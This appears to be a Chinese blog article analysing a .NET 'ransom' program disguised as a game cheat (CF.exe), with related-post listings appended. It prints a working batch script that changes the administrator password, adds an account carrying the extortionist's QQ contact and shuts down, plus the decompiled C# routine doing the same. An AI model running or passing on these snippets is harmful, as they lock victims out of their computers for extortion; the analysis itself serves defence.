前言

恶意程序发展至今,其功能已经从最初的单纯破坏,不断发展为隐私的窥探,信息的盗取,乃至如今非常流行的“敲竹杠”病毒,用于勒索。可见随着时代的发展,病毒的作者们往往也是想利用自己的技术来获取不义之财,变得越来越功利化了。而本系列文章也顺应了这个发展,从病毒讨论到木马,进而来到了“敲竹杠”病毒的讨论上来。

什么是“敲竹杠”病毒

其实“敲竹杠”病毒的行为很简单,它就是篡改我们的计算机的开机密码,然后病毒作者留下个人的联系方式,让受害的用户去联系他,花钱消灾。“敲竹杠”主要通过QQ群和邮件进行传播,经常会伪装成类似于“CF免费刷枪无毒软件”(如这次研究的CF.exe),“免费刷Q币”等极具诱惑性的名称,一旦用户点击运行,系统登陆密码就会被篡改。而普通用户遇到这种情况,往往无能为力,加上“勒索”钱财的数额一般并不大,所以花钱买密码的人也不在少数。由于这种病毒并不需要编写者具备很高深的技术水平,从而也就助长了“敲竹杠”的盛行。这里举一个最简单的“敲竹杠”代码的例子,它是一个批处理(.bat)文件:

@echo off
net user 姜晔 wojiushimima
net user 要密码加QQ123456789 wojiushimima /add
shutdown.exe -s -t 10

这里简单讲解一下上述代码。代码第二行的意思是将名为“姜晔”的账户密码修改为“wojiushimima”(我就是密码)。注意,在我的系统中,账户“姜晔”就是管理员账户,而大多数情况下,系统默认的管理员账户名称为“Administrator”,所以具体情况要具体分析。在此也呼吁大家不要将“Administrator”作为管理员账户名,免得被恶意程序所利用。代码第三行的意思是创建名为“要密码加QQ123456789”的账户,其密码也是“wojiushimima”。代码第四行的意思是在10秒后关闭计算机。运行上述代码,如图所示:

图1 运行“敲竹杠”病毒

程序运行10秒后,自动关机,再开机,如下图所示:

图2

可见,这里出现了两个账户,一个是原始账户,不过密码已经被修改了。另一个账户是病毒作者的联系方式,该账户的密码我们也是不知道的。至此,普通的计算机用户为了能够正常使用自己的电脑,也就只有去联系病毒作者,去买密码了。

什么是.NET

既然本文讨论的是一款基于.NET的“敲竹杠”,那么有必要在这里简单讨论一下什么是.NET。

其实.NET是微软设计的独立于操作系统之上的平台,可以将它看成是一套虚拟机,无论机器运行的是什么操作系统,只要该系统安装了.NET框架,便可以运行.NET可执行程序,享受基于.NET的各类服务。上面这句话是从用户角度出发的观点,如果从Windows系统的角度来理解,.NET就是一系列运行于Ring3层的DLL文件。

可能这么说依旧比较抽象,有兴趣的读者可以查询相关书籍进行进一步的学习研究。我个人觉得我们没必要过于在意这个定义,作为病毒分析人员,更重要的是掌握.NET平台的逆向分析方法。

.NET有一个特点,那就是无论程序是用C#,还是C++,或是VB编写,最终都被编译为.NET的中间语言IL。而静态分析.NET程序,就是用反编译工具将程序的指令字节反编译成IL指令或高级语言,通过阅读反编译代码掌握程序的流程与功能。由于.NET下的可执行文件同时保存有元数据与IL代码,其静态反编译出的代码具有极强的可读性,几乎等同于源代码。

.NET平台的反编译工具最为常用的是ildasm与Reflector。这里我打算选用后者进行分析。该软件目前已经变为收费版,大家可以在 http://www.red-gate.com/products/dotnet-development/reflector/下载14天的全功能试用版。

“敲竹杠”病毒分析

这次的病毒样本名为“CF.exe”,从名称就可以看出它应该是和游戏“穿越火线”相关,伪装成是游戏的辅助类程序,实际上就是“敲竹杠”。但是它的特别之处就在于开创性地采用了.NET框架,瞬间显得与众不同起来。为什么我知道它采用了.NET框架呢?这是PEiD的功劳:

图3

那么接下来就使用Reflector来载入这个病毒样本。由于经过Reflector的分析生成的代码就如同源代码,所以很容易就能够找到恶意程序的核心位置:

图4

该函数的完整代码如下:

private void timer1_Tick(object sender, EventArgs e)
{this.j++;if (this.j <= 3){this.label4.Text = "正在扫描CF网络漏洞\x00b7\x00b7\x00b7";this.progressBar1.Value = this.j;}else if ((this.j <= 5) && (this.j > 3)){this.label4.Text = "正在监测CF模块SX动作\x00b7\x00b7";this.progressBar1.Value = this.j;}else if ((this.j < 10) && (this.j > 5)){this.label4.Text = "避开SX加载辅助模块\x00b7\x00b7\x00b7";this.progressBar1.Value = this.j;}else if (this.j == 10){this.label4.Text = "模块加载成功启动中\x00b7\x00b7\x00b7";this.progressBar1.Value = this.j;ResetUserPassword(Environment.UserName, "razggcd");MessageBox.Show("反外挂联盟提示您:绿色游戏健康生活 共同创建公平的竞技平台 !为了您的计算机安全 请向QQ:1460459195 充值30QB并添加好友索要密码 ! 谢谢配合 !", "提示信息", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);CreateNTUser("加Q1460459195", "razggcd", "");LockWorkStation();}
}

很明显,程序通过计数器的不断增加,从而显示不同的文字,这也就给用户造成了一种假象,以为游戏辅助已经生效,似乎正在运行一样。而当计数器自增到10的时候,就会执行最后一个if语句。该语句中的ResetUserPassword用于将用户密码修改为“razggcd”,之后显示一段信息,让用户与病毒作者联系,以获取密码,实现“敲竹杠”。接下来创建名为“加Q1460459195”,密码为“razggcd”的用户。最后锁定工作站保护其免受未经授权者使用。这一整套流程,与我之前讨论的批处理版的“敲竹杠”大同小异。可见,虽说本病毒改变了外在的形式,但是其内部机理还是没有变化的。

通过上述分析,我们已经获取了密码,那么也就大功告成了。

小结

相比较于之前所分析的病毒木马,“敲竹杠”的分析其实还是非常简单的。特别是这种基于.NET的程序,反编译出来的程序就可以等同于源程序,比汇编代码容易理解多了。由于现在“敲竹杠”是主流,所以我以后会选取一些比较有代表性的“敲竹杠”进行研究。希望大家能够提高防范意识,让这些程序的编写者们无机可乘。

病毒木马查杀实战第013篇:一个基于.NET的“敲竹杠”病毒研究相关推荐

  1. 病毒木马查杀实战第026篇:“白加黑”恶意程序研究(上)

    前言 众所周知,传统的恶意程序都是由单一文件构成的.从而实现某一种或者几种恶意功能. 而这类的恶意程序为了避免被发现以及被查杀,往往会採用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者非常多时候也 ...

  2. 病毒木马查杀实战第009篇:QQ盗号木马之手动查杀

    前言 之前在<病毒木马查杀第002篇:熊猫烧香之手动查杀>中,我在不借助任何工具的情况下,基本实现了对于"熊猫烧香"病毒的查杀.但是毕竟"熊猫烧香" ...

  3. 病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析

    前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见<病毒木马查杀第008篇:熊猫烧香之病毒查杀总结 ...

  4. 病毒木马查杀实战第001篇:基本查杀理论与实验环境配置

    前言 <病毒木马查杀>系列以真实的病毒木马(或统称为恶意程序)为研究对象,通过现有的技术手段对其分析,总结出它的恶意行为,进而制定出相应的应对方法(如编写专杀工具),对其彻底查杀.当然,本 ...

  5. 病毒木马查杀实战第004篇:熊猫烧香之专杀工具的编写

    前言 如果是非感染型的病毒,完成行为分析之后,就可以开始编写专杀工具了.当然对于我们这次研究的对象--"熊猫烧香"来说,其实通过之前的行为分析,我们并没有得出它的所有恶意行为,毕竟 ...

  6. 病毒木马查杀实战第002篇:熊猫烧香之手动查杀

    前言 作为本系列研究的开始,我选择"熊猫烧香"这个病毒为研究对象.之所以选择这一款病毒,主要是因为它具有一定的代表性.一方面它当时造成了极大的影响,使得无论是不是计算机从业人员,都 ...

  7. 病毒木马查杀实战第018篇:病毒特征码查杀之基本原理

    前言 在本系列的导论中,我曾经在"病毒查杀方法"中简单讲解过特征码查杀这种方式.而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定 ...

  8. 病毒木马查杀实战第019篇:病毒特征码查杀之编程实现

    前言 上次我们已经简介过了病毒特征码提取的基本方法,那么这次我们就通过编程来实现对于病毒的特征码查杀. 定义特征码存储结构 为了简单起见.这次我们使用的是setup.exe以及unpacked.exe ...

  9. 病毒木马查杀实战第020篇:Ring3层主动防御之基本原理

    前言 如果说我们的计算机中安装有杀毒软件,那么当我们有意或无意地下载了一个恶意程序后,杀软一般都会弹出一个对话框提示我们,下载的程序很可能是恶意程序,建议删除之类的,或者杀软就不提示,直接删除了:或者 ...

最新文章

  1. Arch Linux PDF格式文件无法显示中文
  2. Android应用程序与SurfaceFlinger服务之间的共享UI元数据(SharedClient)的创建过程分析...
  3. 新的GNSS精度度量是怎样定义的?
  4. 多线程—事件Event
  5. c#中 uint--byte[]--char[]--string相互转换汇总
  6. 前端学习(2404):表单验证总结
  7. 【Pytorch神经网络实战案例】10 搭建深度卷积神经网络
  8. 2020年中国冷链物流行业发展报告
  9. c#基础知识总结学习
  10. HENXU-SOA的业务规划和建模方法之八——组件化业务模型(CBM)介绍
  11. 如何查看teamviewer计算机id,TeamViewer如何设置固定ID密码?查看方法说明
  12. ValueError: Variable in_hidden/weights already exists, disallowed. Did you mean to set reuse=True or
  13. Optimal Rough Terrain Trajectory Generation for Wheeled Mobile Robots 论文阅读笔记
  14. eclipse neon Java编辑器页面字体更改
  15. 小米路由器3 刷 linux,小米路由器3刷入LEDE
  16. Java 百度地图 根据名称获取坐标(经纬度)
  17. 生成式对抗网络GAN(一)—基于python实现
  18. 6-4 输入年份和天数,输出对应的年、月、日 (15分)
  19. Java实现 LeetCode 457 环形数组循环
  20. 云南工商学院计算机录取分数,云南工商学院录取分数线2021是多少分(附历年录取分数线)...

热门文章

  1. win7原版iso_【JUJUMAO_MSDN系统】Windows 10 1903 64位 五版合一 原版ISO镜像
  2. AWVS批量操作脚本
  3. unet医学肺部ct图分割简单记录
  4. 数据库开发与设计规范
  5. Ubuntu 16.04系统安装VS Code流程详解
  6. Problem B. L04-02 一元二次方程的根(重点在于求虚根---初学简单版)
  7. 关于移动宽带连不上某些网站的解决办法
  8. 移动宽带连接电信服务器不稳定,如何解决移动宽带网速不稳定的問題?
  9. js验证身份证(详细版)
  10. 中南民族大学 计算机科学学院,中南民族大学 计算机科学学院 蒋天发老师简介 联系方式 手机电话 邮箱...